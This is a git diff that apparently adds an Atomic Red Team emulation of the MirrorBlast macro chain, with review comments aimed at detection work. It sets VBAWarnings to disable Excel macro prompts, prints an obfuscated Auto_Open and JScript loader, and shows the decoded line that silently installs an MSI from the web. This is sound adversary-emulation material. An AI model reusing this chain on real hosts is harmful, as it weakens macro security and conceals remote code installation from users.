diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 43cd18bb..76bb8da2 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -408,3 +408,17 @@ atomic_tests:
 Remove-Item $file1 -ErrorAction Ignore
 Remove-Item $file2 -ErrorAction Ignore
 name: powershell
+- name: Mirror Blast Emulation
+ description: |
+ Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
+ Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
+ New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
+ & '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm
+ cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
+ name: powershell
+
diff --git a/atomics/T1204.002/bin/mirrorblast_emulation.xlsm b/atomics/T1204.002/bin/mirrorblast_emulation.xlsm
new file mode 100644
index 00000000..dc76be04
Binary files /dev/null and b/atomics/T1204.002/bin/mirrorblast_emulation.xlsm differ
diff --git a/atomics/T1204.002/src/Mirror Blast.txt b/atomics/T1204.002/src/Mirror Blast.txt
new file mode 100644
index 00000000..59d7c92d
--- /dev/null
+++ b/atomics/T1204.002/src/Mirror Blast.txt
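Review bot: The cleanup_command deletes the VBAWarnings value outright instead of restoring whatever the operator had set before, and nothing in it uninstalls the 7-Zip MSI that the macro installs silently (UILevel=1 in the src notes), so a run leaves new software on the host and can change the machine's macro-security posture; the description should at least say so, e.g. `Downloads and silently installs the 7-Zip x64 MSI from 7-zip.org (needs outbound HTTPS); cleanup deletes VBAWarnings rather than restoring it and does not remove 7-Zip.` The description also ends mid-sentence ("an xlsm file designed.") — finish it, e.g. `an xlsm file whose Auto_Open macro runs an obfuscated JScript payload through the ScriptControl COM object`. The hard-coded `'.\Excel 2016.lnk'` under the all-users Start Menu will presumably fail on installs whose shortcut is named differently (Office 365/2019 ship "Excel.lnk"), so consider launching excel.exe by path or listing the shortcut as a prerequisite; the "32 bit version of Office" requirement likely comes from ScriptControl having no 64-bit build, which is worth stating explicitly because the MSI being fetched is itself x64 and readers may conflate the two.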
@@ -0,0 +1,12 @@
+The file that was added to binary is the excel spreadsheet that has the macro to download 7zip.
+
+VBA code (in auto_open excel module)
+Sub Auto_Open() With CreateObject("ScriptControl") .Language = "JScript" .AddCode (Range("A1").Value) End With EndSub
+---------------------
+
+Encoded JS Command:
+eval('}kk)kk"kkikkskkmkk.kk4kk6kkxkk-kk7kk0kk1kk2kkzkk7kk/kkakk/kkgkkrkkokk.kkpkkikkzkk-kk7kk.kkwkkwkkwkk/kk/kk:kkskkpkktkktkkhkk"kk(kktkkckkukkdkkokkrkkPkklkklkkakktkkskknkkIkk;kk1kk=kklkkekkvkkekkLkkIkkUkk{kk)kk)kk"kkrkkekklkklkkakktkkskknkkIkk.kkrkkekklkklkkakktkkskknkkIkkskkwkkokkdkknkkikkWkk"kk(kktkkckkekkjkkbkkOkkXkkekkvkkikktkkckkAkk kkwkkekknkk(kkhkktkkikkw'.split('kk').reverse().join(''))
+
+--------------------
+Decoded JS Command:
+with(new ActiveXObject("WindowsInstaller.Installer")){UILevel=1;InstallProduct("https://www.7-zip.org/a/7z2107-x64.msi")}
\ No newline at end of file
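Review bot: The VBA listing ends with `EndSub`, which is not valid VBA (it must be `End Sub`), and the whole procedure is squashed onto one line, so anyone rebuilding the macro from this file — the only human-readable record of what the binary xlsm contains — gets a compile error; write it out as `Sub Auto_Open()` / `With CreateObject("ScriptControl")` / `.Language = "JScript"` / `.AddCode (Range("A1").Value)` / `End With` / `End Sub` on separate lines. It would also help to say in the first line that the decoded payload silently installs 7-Zip 21.07 x64 (UILevel=1) from 7-zip.org over HTTPS via the WindowsInstaller.Installer COM object, since that MSI install initiated from EXCEL.EXE is presumably the observable a detection engineer will build on, and the encoded string's "kk" delimiter / reverse-join scheme deserves a one-line explanation so the obfuscation layer is understood without running it.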